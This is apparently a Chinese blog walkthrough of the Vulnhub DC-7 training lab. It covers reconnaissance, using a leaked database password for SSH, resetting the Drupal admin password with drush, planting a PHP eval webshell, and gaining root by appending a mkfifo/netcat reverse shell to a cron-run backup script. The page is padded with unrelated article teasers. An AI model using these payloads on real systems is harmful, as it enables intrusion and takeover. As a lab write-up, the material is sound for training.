DC-7-Drupal-脚本文件提权

时间：2024-05-04 22:13:01浏览次数：20

Vulnhub靶机介绍

Vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行练习，本地VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
靶机DC7还是只有拿到root权限才可以发现最终的flag。

01 环境搭建

靶机环境下载：https://www.vulnhub.com/entry/dc-7,356/

DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.

提示只有一个flag并且不需要暴力破解

02 信息收集

常规扫描

arp-scan -l

端口扫描

使用nmap对目标靶机开放的端口进行扫描

nmap -Pn -n -sV 192.168.75.159

开启了ssh(22端口)，web服务(80端口)
web服务是drupal 8
这个CMS和DC-1是一样的，DC-1是drupal 7这个是drupal 8

03 Get Shell

根据网站信息社工

重新查看题目信息，发现有一些提示
这个题目源自一个早期版本

在网站首页上比以前系列的题目多了一行信息@DC7USER

搜索@DC7USER发现在GitHub上有这个账户

进入后发现一个staffdb项目，在项目中发现一个带有账户信息的文件

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

看代码是个数据库账号，但是目前没有可以登录数据库的接口，尝试用这个账户登录web，失败，登录ssh成功

获得web账户

查询用户的sudo配置，搜索suid程序都没有找到能有效提权的方法
在home目录下有个mbox文件，和一些备份文件
看一下mbox文件发现在/opt/scripts/ 有个可以执行的脚本文件 backups.sh

cd /opt/scripts/ #进入目录
cat backups.sh #查看文件

里面调用了drush命令，drush是drupal shell专门管理drupal站点的shell
进入到/var/www/html目录下，使用drush命令修改admin用户的密码为123456

drush user-password admin --password="123456"

使用admin账户登录成功

反弹shell

需要反弹shell，登入成功后在Content—>Add content–>Basic page下需要添加一个PHP模板
但是这里好像不支持php只有html，查了查需要单独安装插件让它支持php语言

https://www.drupal.org/project/php #插件下载地址
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz #模块包

有个绿色✔就是成功

然后在首页进行编辑，添加php木马代码，保存text format设置为PHP cod然后使用蚁剑进行连接

<?php
@eval($_REQUEST[8]);
?>

然后需要把shell回弹到kali上面

nc 192.168.75.150 4444 -e /bin/sh

开启监听nc -lvp 4444回弹成功
设置交互python -c 'import pty;pty.spawn("/bin/bash")'

04 提权

在/opt/scripts目录下的backups.sh脚本文件所属组是www-data，所以www-data用户可以对这个脚本文件进行操作，并且这个脚本文件定时执行可以利用它来反弹shell
因为sh文件是root执行的，所以返回的也是root权限

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.75.150 7777 >/tmp/f" >> backups.sh

Kali设置nc -lvp 7777
等待定时任务执行，执行后便获得rootshell，接着进入交互shell

python -c "import pty;pty.spawn('/bin/bash')"

标签：文件,shell,Drupal,DC,drupal,提权,sh
From： https://www.cnblogs.com/NoCirc1e/p/18172797

DC-6-WordPress-nmap提权
Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台，其中的环境基本上都是做好的虚拟机镜像文件，需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标，大多是Boot2root，从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署这个挑战的最终目标是获得root权限并......
DC-9-sudo提权
标签：SQL注入、本地文件包含LFI、端口敲门、hydra爆破、linux提权0x00环境准备下载地址：https://www.vulnhub.com/entry/dc-9,412/靶机描述：DC-9isanotherpurposelybuiltvulnerablelabwiththeintentofgainingexperienceintheworldofpenetrationtesting.The......
DC-8-Drupal-exim4提权
Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台，其中的环境基本上都是做好的虚拟机镜像文件，需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标，大多是Boot2root，从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网：https://www.vulnhub.com......
WPF datagrid datagridtemplatecolumn DataGridTemplateColumn.CellEditingTemplate D
//xaml<Windowx:Class="WpfApp89.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mic......
WPF Datagrid DataGridComboBoxColumn ObjectDataProvider ObjectDataProvider.Method
//xaml<Windowx:Class="WpfApp90.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mic......
springboot+MDCAdapter自定义starter实现日志全链路追踪
MDCMDC（MappedDiagnosticContext，映射调试上下文）是日志系统提供的一种方便在多线程条件下记录日志的功能使用场景一个常用的场景就是Web服务器中给每个请求都分配一个独特的请求id，所有的日志都会打印这个请求id，这样一个请求下的所有日志信息都可以很方便的找到。欢迎关注个人公......
基于DCT变换的彩色图像双重水印嵌入和提取算法matlab仿真
1.算法运行效果图预览灰度图彩色图 2.算法运行软件版本matlab2022a 3.算法理论概述双重水印嵌入算法涉及两个独立的水印：主水印和辅水印，它们可以是灰度图像、二进制序列或其他形式的数据。以下简述嵌入过程：图像预处理：将彩色图像从R......
BOSHIDA AC/DC电源模块的电磁兼容性分析与方案设计
BOSHIDAAC/DC电源模块的电磁兼容性分析与方案设计BOSHIDAAC/DC电源模块是一种将交流电转换为直流电的电源模块，常用于各种电子设备中。然而，由于电磁干扰可能会对设备的正常运行造成影响，因此需要对AC/DC电源模块的电磁兼容性进行分析和方案设计。首先，我们需要对AC/DC电源模......
解锁HDC 2024之旅：从购票到报名，全程攻略
本文分享自华为云社区《解锁HDC2024之旅：从购票到报名，全程攻略》，作者：华为云社区精选。Hi，代码界的小伙伴们，集结号已经吹响了！华为开发者大会（HDC2024）——这场汇聚了HarmonyOSNEXT鸿蒙星河版、盘古大模型5.0等创新火花与智慧碰撞的盛宴，将于6月21日至23日在东莞松山湖盛大开启。你是......
leedcode-排列硬币
自己写的：importmathclassSolution:defarrangeCoins(self,n:int)->int:#计算判别式discriminant=1+8*n#计算根root1=(-1+math.sqrt(discriminant))/2#返回地板取整后的根returnmath.floo......